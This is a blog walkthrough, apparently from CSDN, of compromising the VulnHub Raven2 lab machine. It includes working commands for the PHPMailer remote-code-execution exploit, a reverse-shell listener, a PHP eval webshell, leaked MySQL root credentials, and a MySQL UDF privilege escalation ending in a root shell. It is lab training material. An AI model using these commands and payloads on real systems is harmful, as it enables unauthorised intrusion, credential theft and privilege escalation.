vulnhub raven2复现

1.扫描全网段,找出了存活主机ip为192.168.85.144

nmap 192.168.85.0/24

2.nmap扫描端口

nmap -p1-65535 192.168.85.144

3.访问此网站,没找到什么地方可以利用漏洞 ,查看中间件为wordpress

 

4.使用dirb对该网站进行目录扫描

dirb http://192.168.85.144/

5.访问扫描出的目录,找几个重要的目录访问,如/vendor,发现了目录遍历,/wordpress/wp-admin/,访问失败做了页面跳转,跳转到raven.local

6.查看文件内容发现网站根路径,版本,phpmailer推测改版本可能为phpmailer的版本,phpmailer是php用来发邮件的一个组件

7.搜索是否有漏洞,可以用msf,也可以用搜索引擎,搜出有远程代码执行漏洞(cve2016-10033),这个可能性大一些

searchsploit是一个用于Exploit-DB的命令行搜索工具

searchsploit phpmailer

8.寻找对应的exp,进行漏洞利用,msf自带的exp失败;或在网上下载exp使用;使用40974.py进行攻击,修改40974.py脚本的内容,其他exp 40968.sh失败还有几个py脚本也失败

msf的exp

使用第0个:

use 0
set rhosts 192.168.85.144
set web_root  /var/www/html
set target_uri  /contact.php
show options 
run

要访问对应生成的文件

利用40974.py:

位置:/usr/share/exploitdb/exploits/php/webapps/40974.py

find / -name '40974.py'   #找位置
cd /tmp
cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./40974.py  #复制
vim 40974.py

要改的几个位置

最上面编码改一下

target目标ip改一下,利用的contact.php

后门改一下

反弹ip和端口改一下

根目录改一下

 运行,攻击机监听本地端口

python 40974.py
pip install requests_toolbelt  #可能需要安装此模块
nc -lvnp 5544

9.访问网站的contact.php,在访问后门文件,成功返回shell会话

python -c "import pty;pty.spawn('/bin/bash')" #构建交互式shell

10.寻找可利用的文件,进入到wordpress目录,找配置文件,看一下有没有数据库连接配置

发现root账号密码

 账号:root

密码:R@v3nSecurity

11.查看端口,看一下mysql服务是否开启,nmap扫端口没扫出来,是开启状态

netstat -anpt

 尝试登录,查看数据

mysql -uroot -pR@v3nSecurity
show databases;
use wordpress;
show tables;
select * from wp_users;

找一下是否有加密的可执行文件 

find / -name 'pass*'

找到可疑文件,但是执行不了,还有一个就是后台地址被重定向了,需要改host文件

 

 

 写一个一句话木马,方便上传文件

echo '<?php @eval($_POST[1])?>' > 1.php

蚁剑连接:

 上传脚本linux-exploit-suggester进行检测是否存有漏洞

几个比较高危的内核漏洞:

CVE-2016-5195(脏牛)

CVE-2021-4034(Polkit)

CVE-2021-3156(SUDO)

CVE-2022-0847(脏管道)

 发现有脏牛和sudo提权,尝试使用对应的exp进行攻击

脏牛提权是c++文件无法编译,g++没有,用kali编译后上传运行也失败,sudo提权失败,版本为1.8.10不符合漏洞版本

定时任务覆盖不行,权限不够 

suid提权不行没找到对应的命令

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

 linux提权的方法基本上都用过了,所以考虑mysql提权,知道了root账号和密码

1.mysql手动提权:

下载对应的exp

wget https://www.exploit-db.com/download/1518
或手动下载

手工下载的,生成了rapator_udf.so,目标靶机上编译失败,是在kali2022.1上编译的

gcc -g -c 1518.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

用蚁剑把文件传到目标主机

mysql-u root -p
R@v3nSecurity
use mysql;
create table foo(line blob);
insert into foo values(load_file('raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
#创建sys_eval函数调用
create function sys_eval returns integer soname 'raptor_udf2.so';
select * from mysql.func;         
select sys_eval('chmod u+s /usr/bin/find');

在利用find提权

find 1.zip -exec /bin/sh \;

成功提权

2.Multiple.Database.Utilization.Tools-2.1.1自动化提权:

mysql默认关闭外联,开启后还是不能成功连接

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'R@v3nSecurity' WITH GRANT OPTION;
flush privileges;

数据库开启了连接,应该是防火墙拦截了,外部连不上,就让里面出来

建立http隧道,让里面出来,上传冰蝎的木马,连接上,使用冰蝎建立http隧道

 目标ip为什么是127.0.0.1,是因为用的webshell连接上了,所以是127.0.0.1,本地监听端口是8000

工具使用提权:

 点udf提权即可成功

参考文章:

(20条消息) Raven 2 靶机渗透_Micr067的博客-CSDN博客https://blog.csdn.net/weixin_41082546/article/details/100054977VulnHub-Raven: 2 靶场渗透测试 - FreeBuf网络安全行业门户https://www.freebuf.com/articles/web/261047.html 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值